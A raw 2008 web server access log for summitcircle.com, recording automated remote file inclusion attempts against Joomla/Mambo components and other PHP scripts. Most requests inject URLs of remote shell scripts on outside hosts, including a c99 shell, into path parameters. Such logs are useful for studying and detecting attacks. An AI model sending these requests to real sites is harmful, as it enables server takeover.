85.17.53.225 - - [29/Jun/2008:05:41:32 -0700] "GET /logs/access_080114.log//?include_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:42:11 -0700] "GET /logs/access_080121.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:42:11 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
89.108.66.115 - - [29/Jun/2008:05:42:22 -0700] "GET /logs/access_071210.log//?include_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.115 - - [29/Jun/2008:05:42:23 -0700] "GET //?include_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.115 - - [29/Jun/2008:05:42:23 -0700] "GET /logs//?include_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.17.3.183 - - [29/Jun/2008:05:42:32 -0700] "GET /index.php?go=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.227.251.172 - - [29/Jun/2008:05:43:18 -0700] "GET //?include_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.115 - - [29/Jun/2008:05:43:21 -0700] "GET /logs/access_080114.log//?include_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.34.164.35 - - [29/Jun/2008:05:43:56 -0700] "GET /logs/access_071112.log/index.php?url=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.34.164.35 - - [29/Jun/2008:05:43:56 -0700] "GET /index.php?url=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.34.164.35 - - [29/Jun/2008:05:43:56 -0700] "GET /logs/index.php?url=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:44:01 -0700] "GET /logs/access_071224.log/dbase.php?action=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:44:01 -0700] "GET /dbase.php?action=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:44:01 -0700] "GET /logs/dbase.php?action=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
63.243.44.3 - - [29/Jun/2008:05:44:10 -0700] "GET /logs/access_080121.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hoopswriters.com/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:44:18 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:44:19 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:46:16 -0700] "GET /logs/access_071210.log//?include_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:46:17 -0700] "GET //?include_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:46:17 -0700] "GET /logs/access_071210.log//?include_path=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:46:17 -0700] "GET /logs//?include_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:46:17 -0700] "GET //?include_path=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:46:18 -0700] "GET /logs//?include_path=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:46:19 -0700] "GET /logs/access_080127.log//?include_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:46:19 -0700] "GET /logs/access_080127.log//?include_path=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:46:22 -0700] "GET /logs/access_071231.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:46:22 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:46:22 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
85.17.53.225 - - [29/Jun/2008:05:46:56 -0700] "GET /logs/access_071210.log//?include_path=http://www.hamnation.com/forums/Skin/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
85.17.53.225 - - [29/Jun/2008:05:46:56 -0700] "GET //?include_path=http://www.hamnation.com/forums/Skin/safe.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.800" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:46:56 -0700] "GET /logs/access_071001.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.17.53.225 - - [29/Jun/2008:05:46:56 -0700] "GET /logs//?include_path=http://www.hamnation.com/forums/Skin/safe.txt????? HTTP/1.1" 200 9952 "-" "libwww-perl/5.800" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:46:56 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:46:56 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:46:57 -0700] "GET /logs/access_071001.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:46:57 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:46:57 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:47:00 -0700] "GET /logs/access_071231.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:47:01 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:47:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:47:02 -0700] "GET /logs/access_071008.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:47:03 -0700] "GET /logs/access_071008.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:47:16 -0700] "GET /logs/access_071021.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:47:16 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:47:16 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
63.243.44.3 - - [29/Jun/2008:05:47:20 -0700] "GET /logs/access_071001.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hoopswriters.com/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:47:31 -0700] "GET /logs/access_071021.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:47:32 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:47:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
85.17.53.225 - - [29/Jun/2008:05:47:36 -0700] "GET /logs/access_080114.log//?include_path=http://www.hamnation.com/forums/Skin/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
201.103.136.133 - - [29/Jun/2008:05:48:17 -0700] "GET /logs/access_071001.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.103.136.133 - - [29/Jun/2008:05:48:17 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.103.136.133 - - [29/Jun/2008:05:48:17 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.17.3.183 - - [29/Jun/2008:05:48:23 -0700] "GET /index.php?site=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:48:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:48:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
212.227.251.172 - - [29/Jun/2008:05:48:31 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
190.41.32.1 - - [29/Jun/2008:05:48:39 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://defacers.awardspace.com/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
190.41.32.1 - - [29/Jun/2008:05:48:40 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://defacers.awardspace.com/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.103.136.133 - - [29/Jun/2008:05:48:45 -0700] "GET /logs/access_071008.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:50:05 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:50:06 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:50:06 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:50:15 -0700] "GET /logs/access.log//errors.php?error=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:50:16 -0700] "GET //errors.php?error=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:05:50:16 -0700] "GET /logs//errors.php?error=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:50:40 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:50:40 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:50:40 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:51:40 -0700] "GET /logs/access_071210.log//?include_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:51:40 -0700] "GET //?include_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:51:40 -0700] "GET /logs//?include_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [29/Jun/2008:05:51:41 -0700] "GET /logs/access_080127.log//?include_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.114.189 - - [29/Jun/2008:05:51:54 -0700] "GET /logs/access.log/include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.114.189 - - [29/Jun/2008:05:51:54 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.114.189 - - [29/Jun/2008:05:51:54 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:52:19 -0700] "GET /logs/access.log//errors.php?error=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:52:19 -0700] "GET //errors.php?error=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:05:52:19 -0700] "GET /logs//errors.php?error=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:52:21 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:52:22 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:52:22 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
194.87.5.70 - - [29/Jun/2008:05:52:27 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:52:56 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:52:56 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:05:52:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.47.204.44 - - [29/Jun/2008:05:53:08 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "summitcircle.com"
72.47.204.44 - - [29/Jun/2008:05:53:08 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:53:10 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:53:10 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
72.47.204.44 - - [29/Jun/2008:05:53:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
72.47.204.44 - - [29/Jun/2008:05:53:12 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:53:17 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:53:17 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:05:53:17 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
80.67.20.109 - - [29/Jun/2008:05:53:24 -0700] "GET /logs/access_071021.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
80.67.20.109 - - [29/Jun/2008:05:53:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
80.67.20.109 - - [29/Jun/2008:05:53:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
74.63.2.169 - - [29/Jun/2008:05:53:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
74.200.206.130 - - [29/Jun/2008:05:53:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "summitcircle.com"
74.200.206.130 - - [29/Jun/2008:05:53:28 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "summitcircle.com"
74.200.206.130 - - [29/Jun/2008:05:53:34 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.summitcircle.com"
74.200.206.130 - - [29/Jun/2008:05:53:34 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.summitcircle.com"
